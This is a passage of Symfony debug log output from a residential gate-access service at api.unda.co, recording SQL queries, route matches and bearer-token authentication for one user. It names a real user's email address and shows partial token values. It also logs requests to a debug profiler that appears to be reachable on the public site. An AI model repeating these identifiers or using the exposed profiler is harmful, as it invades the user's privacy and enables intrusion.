  8845. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8846. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  8847. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8848. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  8849. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
  8850. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  8851. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8852. [2025-12-21 00:30:33] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  8853. [2025-12-21 00:30:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72?panel=security","method":"GET"} []
  8854. [2025-12-21 00:30:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  8855. [2025-12-21 00:31:18] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  8856. [2025-12-21 00:31:18] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  8857. [2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8858. [2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8859. [2025-12-21 00:31:18] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  8860. [2025-12-21 00:31:18] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  8861. [2025-12-21 00:31:18] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8862. [2025-12-21 00:31:18] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8863. [2025-12-21 00:31:18] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8864. [2025-12-21 00:31:18] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8865. [2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8866. [2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8867. [2025-12-21 00:31:18] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8868. [2025-12-21 00:31:18] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8869. [2025-12-21 00:31:18] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8870. [2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  8871. [2025-12-21 00:31:18] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8872. [2025-12-21 00:31:18] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8873. [2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  8874. [2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8875. [2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  8876. [2025-12-21 00:31:18] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  8877. [2025-12-21 00:31:21] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  8878. [2025-12-21 00:31:21] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  8879. [2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8880. [2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8881. [2025-12-21 00:31:21] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  8882. [2025-12-21 00:31:21] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  8883. [2025-12-21 00:31:21] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8884. [2025-12-21 00:31:21] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8885. [2025-12-21 00:31:21] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8886. [2025-12-21 00:31:21] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8887. [2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8888. [2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8889. [2025-12-21 00:31:21] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8890. [2025-12-21 00:31:21] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8891. [2025-12-21 00:31:21] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8892. [2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  8893. [2025-12-21 00:31:21] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8894. [2025-12-21 00:31:21] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8895. [2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  8896. [2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8897. [2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  8898. [2025-12-21 00:31:21] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  8899. [2025-12-21 00:31:23] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  8900. [2025-12-21 00:31:23] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  8901. [2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8902. [2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8903. [2025-12-21 00:31:23] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  8904. [2025-12-21 00:31:23] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  8905. [2025-12-21 00:31:23] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8906. [2025-12-21 00:31:23] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8907. [2025-12-21 00:31:23] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8908. [2025-12-21 00:31:23] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8909. [2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8910. [2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8911. [2025-12-21 00:31:23] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8912. [2025-12-21 00:31:23] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8913. [2025-12-21 00:31:23] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8914. [2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  8915. [2025-12-21 00:31:23] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8916. [2025-12-21 00:31:23] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8917. [2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  8918. [2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8919. [2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  8920. [2025-12-21 00:31:23] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  8921. [2025-12-21 00:31:26] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  8922. [2025-12-21 00:31:26] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  8923. [2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8924. [2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8925. [2025-12-21 00:31:26] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  8926. [2025-12-21 00:31:26] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  8927. [2025-12-21 00:31:26] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8928. [2025-12-21 00:31:26] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8929. [2025-12-21 00:31:26] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8930. [2025-12-21 00:31:26] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8931. [2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8932. [2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8933. [2025-12-21 00:31:26] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8934. [2025-12-21 00:31:26] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8935. [2025-12-21 00:31:26] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8936. [2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  8937. [2025-12-21 00:31:26] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
